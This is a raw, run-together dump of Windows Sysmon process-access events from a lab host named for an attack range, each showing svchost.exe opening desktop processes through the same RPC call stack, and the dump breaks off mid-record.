10341000x8000000000000000298048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298041Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298019Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298018Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:46.959{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298017Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 